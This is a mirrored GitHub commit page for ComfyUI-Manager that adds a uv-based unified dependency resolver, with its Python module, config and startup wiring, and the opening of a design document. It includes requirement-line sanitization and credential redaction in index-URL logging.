mirror of
https://github.com/Comfy-Org/ComfyUI-Manager.git
synced 2026-03-28 20:33:40 +08:00
feat(deps): add unified dependency resolver using uv pip compile
- Add UnifiedDepResolver module with 7 FRs: collect, compile, install pipeline - Integrate startup batch resolution in prestartup_script.py (module scope) - Skip per-node pip install in execute_install_script() when unified mode active - Add use_unified_resolver config flag following use_uv pattern - Input sanitization: reject -r, -e, --find-links, @ file://, path separators - Handle --index-url/--extra-index-url separation with credential redaction - Fallback to per-node pip on resolver failure or uv unavailability - Add 98 unit tests across 20 test classes - Add PRD and Design docs with cm_global integration marked as DEFERRED
This commit is contained in:
parent
0d88a3874d
commit
e60a66b1e6
4
.gitignore
vendored
4
.gitignore
vendored
@ -21,4 +21,6 @@ check2.sh
|
||||
build
|
||||
dist
|
||||
*.egg-info
|
||||
.env
|
||||
.env
|
||||
.claude
|
||||
test_venv
|
||||
|
||||
@ -25,6 +25,7 @@ comfyui_manager_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '
|
||||
cache_dir = os.path.join(comfyui_manager_path, '.cache') # This path is also updated together in **manager_core.update_user_directory**.
|
||||
|
||||
use_uv = False
|
||||
use_unified_resolver = False
|
||||
bypass_ssl = False
|
||||
|
||||
def is_manager_pip_package():
|
||||
|
||||
625
comfyui_manager/common/unified_dep_resolver.py
Normal file
625
comfyui_manager/common/unified_dep_resolver.py
Normal file
@ -0,0 +1,625 @@
|
||||
"""Unified Dependency Resolver for ComfyUI Manager.
|
||||
|
||||
Resolves and installs all node-pack dependencies at once using ``uv pip compile``
|
||||
followed by ``uv pip install -r``, replacing per-node-pack ``pip install`` calls.
|
||||
|
||||
Responsibility scope
|
||||
--------------------
|
||||
- Dependency collection, resolution, and installation **only**.
|
||||
- ``install.py`` execution and ``PIPFixer`` calls are the caller's responsibility.
|
||||
|
||||
See Also
|
||||
--------
|
||||
- docs/dev/PRD-unified-dependency-resolver.md
|
||||
- docs/dev/DESIGN-unified-dependency-resolver.md
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
import os
|
||||
import re
|
||||
import shutil
|
||||
import subprocess
|
||||
import sys
|
||||
import tempfile
|
||||
import time
|
||||
from collections import defaultdict
|
||||
from dataclasses import dataclass, field
|
||||
|
||||
from . import manager_util
|
||||
|
||||
logger = logging.getLogger("ComfyUI-Manager")
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Exceptions
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class UvNotAvailableError(RuntimeError):
    """Signals that no usable ``uv`` command could be located.

    Raised when neither ``python -m uv`` nor a standalone ``uv`` executable
    is available; callers fall back to per-node pip installs.
    """
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Data classes
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
@dataclass
class PackageRequirement:
    """One dependency line declared by a single node pack."""

    name: str    # normalised package name (lowercased, '-' replaced by '_')
    spec: str    # original requirement string, e.g. ``torch>=2.0``
    source: str  # absolute path of the node pack that declared this line
|
||||
|
||||
|
||||
@dataclass
class CollectedDeps:
    """Aggregated result of the dependency-collection step."""

    # Accepted requirement lines, one entry per line per declaring pack.
    requirements: list[PackageRequirement] = field(default_factory=list)
    # Rejected/filtered lines as ``(line, reason)`` pairs.
    skipped: list[tuple[str, str]] = field(default_factory=list)
    # Normalised package name -> list of node-pack paths that request it.
    sources: dict[str, list[str]] = field(default_factory=dict)
    # De-duplicated ``--extra-index-url`` values found in requirements files.
    extra_index_urls: list[str] = field(default_factory=list)
|
||||
|
||||
|
||||
@dataclass
class LockfileResult:
    """Outcome of the ``uv pip compile`` step."""

    success: bool
    # Path to the pinned requirements file; ``None`` on failure.
    lockfile_path: str | None = None
    # Human-readable conflict/error lines extracted from stderr.
    conflicts: list[str] = field(default_factory=list)
    # Raw stderr of the compile invocation (empty on success).
    stderr: str = ""
|
||||
|
||||
|
||||
@dataclass
class InstallResult:
    """Outcome of ``uv pip install -r`` (atomic: all-or-nothing)."""

    success: bool
    # Output lines reporting installed/updated packages.
    installed: list[str] = field(default_factory=list)
    # Output lines reporting already-satisfied packages.
    skipped: list[str] = field(default_factory=list)
    # Raw stderr of the install invocation (empty on success).
    stderr: str = ""
|
||||
|
||||
|
||||
@dataclass
class ResolveResult:
    """End-to-end result of the collect → compile → install pipeline."""

    success: bool
    collected: CollectedDeps | None = None   # step-1 output, when reached
    lockfile: LockfileResult | None = None   # step-2 output, when reached
    install: InstallResult | None = None     # step-3 output, when reached
    error: str | None = None                 # summary message on failure
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Resolver
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
# Prefix for the resolver's temp directories; also used by cleanup_stale_tmp().
_TMP_PREFIX = "comfyui_resolver_"

# Security: reject dangerous requirement patterns. Lines beginning with
# -r/-e/-c/-f (and long forms), or referencing a local ``file://`` source,
# could pull code from arbitrary paths or nested requirement files.
_DANGEROUS_PATTERNS = re.compile(
    r'^(-r\b|--requirement\b|-e\b|--editable\b|-c\b|--constraint\b'
    r'|--find-links\b|-f\b|.*@\s*file://)',
    re.IGNORECASE,
)

# Credential redaction in index URLs: matches the ``user:pass@`` segment
# between the scheme separator and the host, for masking in log output.
_CREDENTIAL_PATTERN = re.compile(r'://([^@]+)@')

# Version-spec parsing: splits ``name<op>version`` into three groups
# (same regex as existing ``is_blacklisted()``).
_VERSION_SPEC_PATTERN = re.compile(r'([^<>!~=]+)([<>!~=]=?)([^ ]*)')
|
||||
|
||||
|
||||
|
||||
def collect_node_pack_paths(custom_nodes_dirs: list[str]) -> list[str]:
    """Collect all installed node-pack directory paths.

    Parameters
    ----------
    custom_nodes_dirs:
        Base directories returned by ``folder_paths.get_folder_paths('custom_nodes')``.

    Returns
    -------
    list[str]
        Paths of node-pack directories (immediate subdirectories of each base).
        Non-existent bases and plain files are silently skipped.
    """
    pack_paths: list[str] = []
    for base_dir in custom_nodes_dirs:
        if not os.path.isdir(base_dir):
            continue
        pack_paths.extend(
            candidate
            for entry in os.listdir(base_dir)
            if os.path.isdir(candidate := os.path.join(base_dir, entry))
        )
    return pack_paths
|
||||
|
||||
|
||||
def collect_base_requirements(comfy_path: str) -> list[str]:
    """Read ComfyUI's own base requirements as constraint lines.

    Reads ``requirements.txt`` and ``manager_requirements.txt`` from *comfy_path*.
    These are ComfyUI-level dependencies only — never read from node packs.

    Parameters
    ----------
    comfy_path:
        Root directory of the ComfyUI installation.

    Returns
    -------
    list[str]
        Non-empty, non-comment requirement lines, stripped of whitespace.
    """
    collected: list[str] = []
    for fname in ("requirements.txt", "manager_requirements.txt"):
        candidate = os.path.join(comfy_path, fname)
        if not os.path.exists(candidate):
            continue
        with open(candidate, encoding="utf-8") as fh:
            for raw in fh:
                stripped = raw.strip()
                # Skip blanks and full-line comments.
                if stripped and not stripped.startswith('#'):
                    collected.append(stripped)
    return collected
|
||||
|
||||
|
||||
class UnifiedDepResolver:
    """Unified dependency resolver.

    Resolves and installs all dependencies of (installed + new) node packs at
    once using *uv*: collect ``requirements.txt`` lines, pin them with
    ``uv pip compile``, then install via ``uv pip install -r``.

    Parameters
    ----------
    node_pack_paths:
        Absolute paths of node-pack directories to consider.
    base_requirements:
        Lines from ComfyUI's own ``requirements.txt`` (used as constraints).
    blacklist:
        Package names to skip unconditionally (default: ``cm_global.pip_blacklist``).
    overrides:
        Package-name remapping dict (default: ``cm_global.pip_overrides``).
    downgrade_blacklist:
        Packages whose installed versions must not be downgraded
        (default: ``cm_global.pip_downgrade_blacklist``).
    """

    def __init__(
        self,
        node_pack_paths: list[str],
        base_requirements: list[str] | None = None,
        blacklist: set[str] | None = None,
        overrides: dict[str, str] | None = None,
        downgrade_blacklist: list[str] | None = None,
    ) -> None:
        self.node_pack_paths = node_pack_paths
        self.base_requirements = base_requirements or []
        self.blacklist: set[str] = blacklist if blacklist is not None else set()
        self.overrides: dict[str, str] = overrides if overrides is not None else {}
        self.downgrade_blacklist: list[str] = (
            downgrade_blacklist if downgrade_blacklist is not None else []
        )

    # ------------------------------------------------------------------
    # Public API
    # ------------------------------------------------------------------

    def resolve_and_install(self) -> ResolveResult:
        """Execute the full pipeline: cleanup → collect → compile → install.

        Returns a :class:`ResolveResult`; never raises except for
        :class:`UvNotAvailableError`, which is propagated so the caller can
        fall back to per-node pip installs.
        """
        self.cleanup_stale_tmp()

        tmp_dir: str | None = None
        try:
            # 1. Collect
            collected = self.collect_requirements()
            if not collected.requirements:
                logger.info("[UnifiedDepResolver] No dependencies to resolve")
                return ResolveResult(success=True, collected=collected)

            logger.info(
                "[UnifiedDepResolver] Collected %d deps from %d sources (skipped %d)",
                len(collected.requirements),
                len(collected.sources),
                len(collected.skipped),
            )

            # 2. Compile
            lockfile = self.compile_lockfile(collected)
            if not lockfile.success:
                # compile_lockfile() already removed its temp dir on failure.
                return ResolveResult(
                    success=False,
                    collected=collected,
                    lockfile=lockfile,
                    error=f"compile failed: {'; '.join(lockfile.conflicts)}",
                )
            # tmp_dir is the parent of lockfile_path; removed in `finally`.
            tmp_dir = os.path.dirname(lockfile.lockfile_path)  # type: ignore[arg-type]

            # 3. Install
            install = self.install_from_lockfile(lockfile.lockfile_path)  # type: ignore[arg-type]
            return ResolveResult(
                success=install.success,
                collected=collected,
                lockfile=lockfile,
                install=install,
                error=install.stderr if not install.success else None,
            )
        except UvNotAvailableError:
            # Deliberate: the caller handles the fallback to per-node pip.
            raise
        except Exception as exc:
            logger.warning("[UnifiedDepResolver] unexpected error: %s", exc)
            return ResolveResult(success=False, error=str(exc))
        finally:
            if tmp_dir and os.path.isdir(tmp_dir):
                shutil.rmtree(tmp_dir, ignore_errors=True)

    # ------------------------------------------------------------------
    # Step 1: collect
    # ------------------------------------------------------------------

    def collect_requirements(self) -> CollectedDeps:
        """Collect dependencies from all node packs.

        Each ``requirements.txt`` line passes, in order, through: security
        rejection, index-URL separation, path-separator rejection, override
        remapping, blacklist filtering, and downgrade-blacklist filtering.
        """
        requirements: list[PackageRequirement] = []
        skipped: list[tuple[str, str]] = []
        sources: dict[str, list[str]] = defaultdict(list)
        extra_index_urls: list[str] = []

        for pack_path in self.node_pack_paths:
            # Exclude disabled node packs (directory-based mechanism).
            if self._is_disabled_path(pack_path):
                continue

            req_file = os.path.join(pack_path, "requirements.txt")
            if not os.path.exists(req_file):
                continue

            for raw_line in self._read_requirements(req_file):
                # Strip inline comments before any other processing.
                line = raw_line.split('#')[0].strip()
                if not line:
                    continue

                # 0. Security: reject dangerous patterns
                if _DANGEROUS_PATTERNS.match(line):
                    skipped.append((line, f"rejected: dangerous pattern in {pack_path}"))
                    logger.warning(
                        "[UnifiedDepResolver] rejected dangerous line: '%s' from %s",
                        line, pack_path,
                    )
                    continue

                # 1. Separate --index-url / --extra-index-url handling
                # (before path separator check, because URLs contain '/')
                if '--index-url' in line or '--extra-index-url' in line:
                    pkg_spec, index_url = self._split_index_url(line)
                    if index_url:
                        extra_index_urls.append(index_url)
                    line = pkg_spec
                    if not line:
                        # Standalone option line (no package prefix)
                        continue

                # Reject path separators in package name portion
                pkg_name_part = re.split(r'[><=!~;]', line)[0]
                if '/' in pkg_name_part or '\\' in pkg_name_part:
                    skipped.append((line, "rejected: path separator in package name"))
                    logger.warning(
                        "[UnifiedDepResolver] rejected path separator: '%s' from %s",
                        line, pack_path,
                    )
                    continue

                # 2. Remap package name
                pkg_spec = self._remap_package(line)

                # 3. Extract normalised name
                pkg_name = self._extract_package_name(pkg_spec)

                # 4. Blacklist check
                if pkg_name in self.blacklist:
                    skipped.append((pkg_spec, "blacklisted"))
                    continue

                # 5. Downgrade blacklist check
                if self._is_downgrade_blacklisted(pkg_name, pkg_spec):
                    skipped.append((pkg_spec, "downgrade blacklisted"))
                    continue

                # 6. Collect (no dedup — uv handles resolution)
                requirements.append(
                    PackageRequirement(name=pkg_name, spec=pkg_spec, source=pack_path)
                )
                sources[pkg_name].append(pack_path)

        return CollectedDeps(
            requirements=requirements,
            skipped=skipped,
            sources=dict(sources),
            extra_index_urls=list(set(extra_index_urls)),
        )

    # ------------------------------------------------------------------
    # Step 2: compile
    # ------------------------------------------------------------------

    def compile_lockfile(self, deps: CollectedDeps) -> LockfileResult:
        """Generate pinned requirements via ``uv pip compile``.

        Fix: the temp directory is now removed on every failure path here.
        A failed result carries no ``lockfile_path``, so the caller's
        ``finally`` cleanup in :meth:`resolve_and_install` never saw the
        directory and it previously leaked until ``cleanup_stale_tmp``.
        """
        tmp_dir = tempfile.mkdtemp(prefix=_TMP_PREFIX)

        try:
            # Write temp requirements
            tmp_req = os.path.join(tmp_dir, "input-requirements.txt")
            with open(tmp_req, "w", encoding="utf-8") as fh:
                for req in deps.requirements:
                    fh.write(req.spec + "\n")

            # Write constraints (base dependencies)
            tmp_constraints: str | None = None
            if self.base_requirements:
                tmp_constraints = os.path.join(tmp_dir, "constraints.txt")
                with open(tmp_constraints, "w", encoding="utf-8") as fh:
                    for line in self.base_requirements:
                        fh.write(line.strip() + "\n")

            lockfile_path = os.path.join(tmp_dir, "resolved-requirements.txt")

            cmd = self._get_uv_cmd() + [
                "pip", "compile",
                tmp_req,
                "--output-file", lockfile_path,
                "--python", sys.executable,
            ]
            if tmp_constraints:
                cmd += ["--constraint", tmp_constraints]

            for url in deps.extra_index_urls:
                logger.info(
                    "[UnifiedDepResolver] extra-index-url: %s",
                    self._redact_url(url),
                )
                cmd += ["--extra-index-url", url]

            # Redact each argument in the log line — index URLs may carry creds.
            logger.info("[UnifiedDepResolver] running: %s", " ".join(
                self._redact_url(c) for c in cmd
            ))

            try:
                result = subprocess.run(
                    cmd,
                    capture_output=True,
                    text=True,
                    timeout=300,
                )
            except subprocess.TimeoutExpired:
                logger.warning("[UnifiedDepResolver] uv pip compile timed out (300s)")
                shutil.rmtree(tmp_dir, ignore_errors=True)
                return LockfileResult(
                    success=False,
                    conflicts=["compile timeout exceeded (300s)"],
                    stderr="TimeoutExpired",
                )

            if result.returncode != 0:
                conflicts = self._parse_conflicts(result.stderr)
                shutil.rmtree(tmp_dir, ignore_errors=True)
                return LockfileResult(
                    success=False,
                    conflicts=conflicts,
                    stderr=result.stderr,
                )

            if not os.path.exists(lockfile_path):
                shutil.rmtree(tmp_dir, ignore_errors=True)
                return LockfileResult(
                    success=False,
                    conflicts=["lockfile not created despite success return code"],
                    stderr=result.stderr,
                )

            return LockfileResult(success=True, lockfile_path=lockfile_path)

        except UvNotAvailableError:
            shutil.rmtree(tmp_dir, ignore_errors=True)
            raise
        except Exception:
            shutil.rmtree(tmp_dir, ignore_errors=True)
            raise

    # ------------------------------------------------------------------
    # Step 3: install
    # ------------------------------------------------------------------

    def install_from_lockfile(self, lockfile_path: str) -> InstallResult:
        """Install from pinned requirements (``uv pip install -r``).

        Do **not** use ``uv pip sync`` — it deletes packages not in the
        lockfile, risking removal of torch, ComfyUI deps, etc.
        """
        cmd = self._get_uv_cmd() + [
            "pip", "install",
            "--requirement", lockfile_path,
            "--python", sys.executable,
        ]

        logger.info("[UnifiedDepResolver] running: %s", " ".join(cmd))

        try:
            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=600,
            )
        except subprocess.TimeoutExpired:
            logger.warning("[UnifiedDepResolver] uv pip install timed out (600s)")
            return InstallResult(
                success=False,
                stderr="TimeoutExpired: install exceeded 600s",
            )

        installed, skipped_pkgs = self._parse_install_output(result)

        return InstallResult(
            success=result.returncode == 0,
            installed=installed,
            skipped=skipped_pkgs,
            stderr=result.stderr if result.returncode != 0 else "",
        )

    # ------------------------------------------------------------------
    # uv command resolution
    # ------------------------------------------------------------------

    def _get_uv_cmd(self) -> list[str]:
        """Determine the ``uv`` command to use.

        ``python_embeded`` spelling is intentional — matches the actual path
        name in the ComfyUI Windows distribution.

        Raises
        ------
        UvNotAvailableError
            If neither ``python -m uv`` nor a standalone ``uv`` is usable.
        """
        embedded = 'python_embeded' in sys.executable

        # 1. Try uv as a Python module (build the command once, probe, reuse).
        module_cmd = [sys.executable] + (['-s'] if embedded else []) + ['-m', 'uv']
        try:
            subprocess.check_output(
                module_cmd + ['--version'], stderr=subprocess.DEVNULL, timeout=5
            )
            return module_cmd
        except Exception:
            pass

        # 2. Standalone uv executable
        if shutil.which('uv'):
            return ['uv']

        raise UvNotAvailableError("uv is not available")

    # ------------------------------------------------------------------
    # Helpers — collection
    # ------------------------------------------------------------------

    @staticmethod
    def _is_disabled_path(path: str) -> bool:
        """Return ``True`` if *path* is within a ``.disabled`` directory."""
        # New style: custom_nodes/.disabled/{name}
        if '/.disabled/' in path or os.path.basename(os.path.dirname(path)) == '.disabled':
            return True
        # Old style: {name}.disabled suffix.
        # Fix: also strip trailing '\' so Windows paths are recognised.
        if path.rstrip('/\\').endswith('.disabled'):
            return True
        return False

    @staticmethod
    def _read_requirements(filepath: str) -> list[str]:
        """Read requirements file using ``robust_readlines`` pattern."""
        return manager_util.robust_readlines(filepath)

    @staticmethod
    def _split_index_url(line: str) -> tuple[str, str | None]:
        """Split ``'package --index-url URL'`` → ``(package, URL)``.

        Also handles standalone ``--index-url URL`` and
        ``--extra-index-url URL`` lines (with no package prefix).
        """
        # Handle --extra-index-url first (contains '--index-url' as substring)
        for option in ('--extra-index-url', '--index-url'):
            if option in line:
                parts = line.split(option, 1)
                pkg_spec = parts[0].strip()
                url = parts[1].strip() if len(parts) == 2 else None
                return pkg_spec, url
        return line, None

    def _remap_package(self, pkg: str) -> str:
        """Apply ``pip_overrides`` remapping."""
        if pkg in self.overrides:
            remapped = self.overrides[pkg]
            logger.info("[UnifiedDepResolver] '%s' remapped to '%s'", pkg, remapped)
            return remapped
        return pkg

    @staticmethod
    def _extract_package_name(spec: str) -> str:
        """Extract normalised package name from a requirement spec.

        Normalisation is lowercase with ``-`` replaced by ``_``; must stay
        consistent with how blacklist/override keys are expressed.
        """
        name = re.split(r'[><=!~;\[@ ]', spec)[0].strip()
        return name.lower().replace('-', '_')

    def _is_downgrade_blacklisted(self, pkg_name: str, pkg_spec: str) -> bool:
        """Reproduce the downgrade logic from ``is_blacklisted()``.

        Uses ``manager_util.StrictVersion`` — **not** ``packaging.version``.
        """
        if pkg_name not in self.downgrade_blacklist:
            return False

        installed = manager_util.get_installed_packages()
        match = _VERSION_SPEC_PATTERN.search(pkg_spec)

        if match is None:
            # No version spec: prevent reinstall if already installed
            if pkg_name in installed:
                return True
        elif match.group(2) in ('<=', '==', '<', '~='):
            # Only upper-bounding operators can force a downgrade.
            if pkg_name in installed:
                try:
                    installed_ver = manager_util.StrictVersion(installed[pkg_name])
                    requested_ver = manager_util.StrictVersion(match.group(3))
                    if installed_ver >= requested_ver:
                        return True
                except (ValueError, TypeError):
                    # Unparseable version: allow the spec through rather than block it.
                    logger.warning(
                        "[UnifiedDepResolver] version parse failed: %s", pkg_spec,
                    )
                    return False

        return False

    # ------------------------------------------------------------------
    # Helpers — parsing & output
    # ------------------------------------------------------------------

    @staticmethod
    def _parse_conflicts(stderr: str) -> list[str]:
        """Extract conflict descriptions from ``uv pip compile`` stderr."""
        conflicts: list[str] = []
        for line in stderr.splitlines():
            line = line.strip()
            if line and ('conflict' in line.lower() or 'error' in line.lower()):
                conflicts.append(line)
        # Explicit parentheses (was relying on `or` binding tighter than the
        # ternary): fall back to the whole stderr only when no individual
        # line matched; empty stderr yields an empty list.
        return conflicts or ([stderr.strip()] if stderr.strip() else [])

    @staticmethod
    def _parse_install_output(
        result: subprocess.CompletedProcess[str],
    ) -> tuple[list[str], list[str]]:
        """Parse ``uv pip install`` stdout for installed/skipped packages."""
        installed: list[str] = []
        skipped_pkgs: list[str] = []
        for line in result.stdout.splitlines():
            line_lower = line.strip().lower()
            if 'installed' in line_lower or 'updated' in line_lower:
                installed.append(line.strip())
            elif 'already' in line_lower or 'satisfied' in line_lower:
                skipped_pkgs.append(line.strip())
        return installed, skipped_pkgs

    @staticmethod
    def _redact_url(url: str) -> str:
        """Mask ``user:pass@`` credentials in URLs."""
        return _CREDENTIAL_PATTERN.sub('://****@', url)

    # ------------------------------------------------------------------
    # Temp-file housekeeping
    # ------------------------------------------------------------------

    @classmethod
    def cleanup_stale_tmp(cls, max_age_seconds: int = 3600) -> None:
        """Remove stale temp directories from previous abnormal terminations.

        Fix: ``entry.is_dir()``/``entry.stat()`` are both inside the ``try``
        (either can raise ``OSError`` if the entry vanishes concurrently),
        and the ``scandir`` iterator is closed via context manager.
        """
        tmp_root = tempfile.gettempdir()
        now = time.time()
        with os.scandir(tmp_root) as entries:
            for entry in entries:
                if not entry.name.startswith(_TMP_PREFIX):
                    continue
                try:
                    if entry.is_dir() and now - entry.stat().st_mtime > max_age_seconds:
                        shutil.rmtree(entry.path, ignore_errors=True)
                        logger.info(
                            "[UnifiedDepResolver] cleaned stale tmp: %s", entry.path,
                        )
                except OSError:
                    pass
|
||||
@ -843,7 +843,10 @@ class UnifiedManager:
|
||||
install_cmd = ["#LAZY-INSTALL-SCRIPT", sys.executable]
|
||||
return try_install_script(url, repo_path, install_cmd)
|
||||
else:
|
||||
if os.path.exists(requirements_path) and not no_deps:
|
||||
if not no_deps and manager_util.use_unified_resolver:
|
||||
# Unified mode: skip per-node pip install (deps resolved at startup batch)
|
||||
logging.info("[UnifiedDepResolver] deps deferred to startup batch resolution for %s", repo_path)
|
||||
elif os.path.exists(requirements_path) and not no_deps:
|
||||
print("Install: pip packages")
|
||||
pip_fixer = manager_util.PIPFixer(manager_util.get_installed_packages(), context.comfy_path, context.manager_files_path)
|
||||
lines = manager_util.robust_readlines(requirements_path)
|
||||
@ -1604,6 +1607,7 @@ def write_config():
|
||||
config['default'] = {
|
||||
'git_exe': get_config()['git_exe'],
|
||||
'use_uv': get_config()['use_uv'],
|
||||
'use_unified_resolver': get_config()['use_unified_resolver'],
|
||||
'channel_url': get_config()['channel_url'],
|
||||
'share_option': get_config()['share_option'],
|
||||
'bypass_ssl': get_config()['bypass_ssl'],
|
||||
@ -1642,12 +1646,14 @@ def read_config():
|
||||
return default_conf[key].lower() == 'true' if key in default_conf else False
|
||||
|
||||
manager_util.use_uv = default_conf['use_uv'].lower() == 'true' if 'use_uv' in default_conf else False
|
||||
manager_util.use_unified_resolver = default_conf['use_unified_resolver'].lower() == 'true' if 'use_unified_resolver' in default_conf else False
|
||||
manager_util.bypass_ssl = get_bool('bypass_ssl', False)
|
||||
|
||||
return {
|
||||
'http_channel_enabled': get_bool('http_channel_enabled', False),
|
||||
'git_exe': default_conf.get('git_exe', ''),
|
||||
'use_uv': get_bool('use_uv', True),
|
||||
'use_unified_resolver': get_bool('use_unified_resolver', False),
|
||||
'channel_url': default_conf.get('channel_url', DEFAULT_CHANNEL),
|
||||
'default_cache_as_channel_url': get_bool('default_cache_as_channel_url', False),
|
||||
'share_option': default_conf.get('share_option', 'all').lower(),
|
||||
@ -1668,12 +1674,14 @@ def read_config():
|
||||
import importlib.util
|
||||
# temporary disable `uv` on Windows by default (https://github.com/Comfy-Org/ComfyUI-Manager/issues/1969)
|
||||
manager_util.use_uv = importlib.util.find_spec("uv") is not None and platform.system() != "Windows"
|
||||
manager_util.use_unified_resolver = False
|
||||
manager_util.bypass_ssl = False
|
||||
|
||||
return {
|
||||
'http_channel_enabled': False,
|
||||
'git_exe': '',
|
||||
'use_uv': manager_util.use_uv,
|
||||
'use_unified_resolver': False,
|
||||
'channel_url': DEFAULT_CHANNEL,
|
||||
'default_cache_as_channel_url': False,
|
||||
'share_option': 'all',
|
||||
@ -1871,7 +1879,6 @@ def __win_check_git_pull(path):
|
||||
|
||||
|
||||
def execute_install_script(url, repo_path, lazy_mode=False, instant_execution=False, no_deps=False):
|
||||
# import ipdb; ipdb.set_trace()
|
||||
install_script_path = os.path.join(repo_path, "install.py")
|
||||
requirements_path = os.path.join(repo_path, "requirements.txt")
|
||||
|
||||
@ -1879,7 +1886,10 @@ def execute_install_script(url, repo_path, lazy_mode=False, instant_execution=Fa
|
||||
install_cmd = ["#LAZY-INSTALL-SCRIPT", sys.executable]
|
||||
try_install_script(url, repo_path, install_cmd)
|
||||
else:
|
||||
if os.path.exists(requirements_path) and not no_deps:
|
||||
if not no_deps and manager_util.use_unified_resolver:
|
||||
# Unified mode: skip per-node pip install (deps resolved at startup batch)
|
||||
logging.info("[UnifiedDepResolver] deps deferred to startup batch resolution for %s", repo_path)
|
||||
elif os.path.exists(requirements_path) and not no_deps:
|
||||
print("Install: pip packages")
|
||||
pip_fixer = manager_util.PIPFixer(manager_util.get_installed_packages(), context.comfy_path, context.manager_files_path)
|
||||
with open(requirements_path, "r") as requirements_file:
|
||||
|
||||
@ -88,6 +88,11 @@ def read_uv_mode():
|
||||
if 'use_uv' in default_conf:
|
||||
manager_util.use_uv = default_conf['use_uv'].lower() == 'true'
|
||||
|
||||
|
||||
def read_unified_resolver_mode():
    # Mirror of read_uv_mode() for the unified-resolver flag: propagate the
    # config value (string 'true'/'false') into manager_util as a bool.
    # Leaves manager_util.use_unified_resolver untouched when the key is absent.
    if 'use_unified_resolver' in default_conf:
        manager_util.use_unified_resolver = default_conf['use_unified_resolver'].lower() == 'true'
|
||||
|
||||
def check_file_logging():
|
||||
global enable_file_logging
|
||||
if 'file_logging' in default_conf and default_conf['file_logging'].lower() == 'false':
|
||||
@ -96,9 +101,14 @@ def check_file_logging():
|
||||
|
||||
read_config()
|
||||
read_uv_mode()
|
||||
read_unified_resolver_mode()
|
||||
security_check.security_check()
|
||||
check_file_logging()
|
||||
|
||||
# Module-level flag set by startup batch resolver when it succeeds.
|
||||
# Used by execute_lazy_install_script() to skip per-node pip installs.
|
||||
_unified_resolver_succeeded = False
|
||||
|
||||
cm_global.pip_overrides = {}
|
||||
|
||||
if os.path.exists(manager_pip_overrides_path):
|
||||
@ -581,7 +591,8 @@ def execute_lazy_install_script(repo_path, executable):
|
||||
install_script_path = os.path.join(repo_path, "install.py")
|
||||
requirements_path = os.path.join(repo_path, "requirements.txt")
|
||||
|
||||
if os.path.exists(requirements_path):
|
||||
if os.path.exists(requirements_path) and not _unified_resolver_succeeded:
|
||||
# Per-node pip install: only runs if unified resolver is disabled or failed
|
||||
print(f"Install: pip packages for '{repo_path}'")
|
||||
|
||||
lines = manager_util.robust_readlines(requirements_path)
|
||||
@ -751,6 +762,35 @@ def execute_startup_script():
|
||||
print("#######################################################################\n")
|
||||
|
||||
|
||||
# --- Unified dependency resolver: batch resolution at startup ---
# Runs unconditionally when enabled, independent of install-scripts.txt existence.
if manager_util.use_unified_resolver:
    try:
        from .common.unified_dep_resolver import (
            UnifiedDepResolver,
            UvNotAvailableError,
            collect_base_requirements,
            collect_node_pack_paths,
        )

        # NOTE(review): empty blacklist/overrides/downgrade_blacklist are
        # passed deliberately in v1 — wiring real cm_global values is marked
        # DEFERRED in the design doc.
        _resolver = UnifiedDepResolver(
            node_pack_paths=collect_node_pack_paths(folder_paths.get_folder_paths('custom_nodes')),
            base_requirements=collect_base_requirements(comfy_path),
            blacklist=set(),
            overrides={},
            downgrade_blacklist=[],
        )
        _result = _resolver.resolve_and_install()
        if _result.success:
            # Flag consumed by execute_lazy_install_script() to skip
            # per-node pip installs for this session.
            _unified_resolver_succeeded = True
            logging.info("[UnifiedDepResolver] startup batch resolution succeeded")
        else:
            logging.warning("[UnifiedDepResolver] startup batch failed: %s, falling back to per-node pip", _result.error)
    except UvNotAvailableError:
        logging.warning("[UnifiedDepResolver] uv not available at startup, falling back to per-node pip")
    except Exception as e:
        # Any unexpected failure must never block ComfyUI startup; the
        # per-node pip path remains available because the flag stays False.
        logging.warning("[UnifiedDepResolver] startup error: %s, falling back to per-node pip", e)
|
||||
|
||||
# Check if script_list_path exists
|
||||
if os.path.exists(script_list_path):
|
||||
execute_startup_script()
|
||||
|
||||
727
docs/dev/DESIGN-unified-dependency-resolver.md
Normal file
727
docs/dev/DESIGN-unified-dependency-resolver.md
Normal file
@ -0,0 +1,727 @@
|
||||
# Architecture Design: Unified Dependency Resolver
|
||||
|
||||
## 1. System Architecture
|
||||
|
||||
### 1.1 Module Location
|
||||
|
||||
```
|
||||
comfyui_manager/
|
||||
├── glob/
|
||||
│ └── manager_core.py # Existing: execute_install_script() call sites (2 locations)
|
||||
├── common/
|
||||
│ ├── manager_util.py # Existing: get_pip_cmd(), PIPFixer, use_uv flag
|
||||
│ ├── cm_global.py # Existing: pip_overrides, pip_blacklist (runtime dynamic assignment)
|
||||
│ └── unified_dep_resolver.py # New: Unified dependency resolution module
|
||||
├── prestartup_script.py # Existing: config reading, remap_pip_package, cm_global initialization
|
||||
└── legacy/
|
||||
└── manager_core.py # Legacy (not a modification target)
|
||||
```
|
||||
|
||||
The new module `unified_dep_resolver.py` is added to the `comfyui_manager/common/` directory.
|
||||
It reuses `manager_util` utilities and `cm_global` global state from the same package.
|
||||
|
||||
> **Warning**: `cm_global.pip_overrides`, `pip_blacklist`, `pip_downgrade_blacklist` are
|
||||
> NOT defined in `cm_global.py`. They are **dynamically assigned** during `prestartup_script.py` execution.
|
||||
> In v1 unified mode, these are **not applied** — empty values are passed to the resolver constructor.
|
||||
> The constructor interface accepts them for future extensibility (defaults to empty when `None`).
|
||||
>
|
||||
> **[DEFERRED]** Reading actual `cm_global` values at startup is deferred to a future version.
|
||||
> The startup batch resolver in `prestartup_script.py` currently passes `blacklist=set()`,
|
||||
> `overrides={}`, `downgrade_blacklist=[]`. The constructor and internal methods
|
||||
> (`_remap_package`, `_is_downgrade_blacklisted`, blacklist check) are fully implemented
|
||||
> and will work once real values are provided.
|
||||
|
||||
### 1.2 Overall Flow
|
||||
|
||||
```mermaid
|
||||
flowchart TD
|
||||
subgraph INSTALL_TIME["Install Time (immediate)"]
|
||||
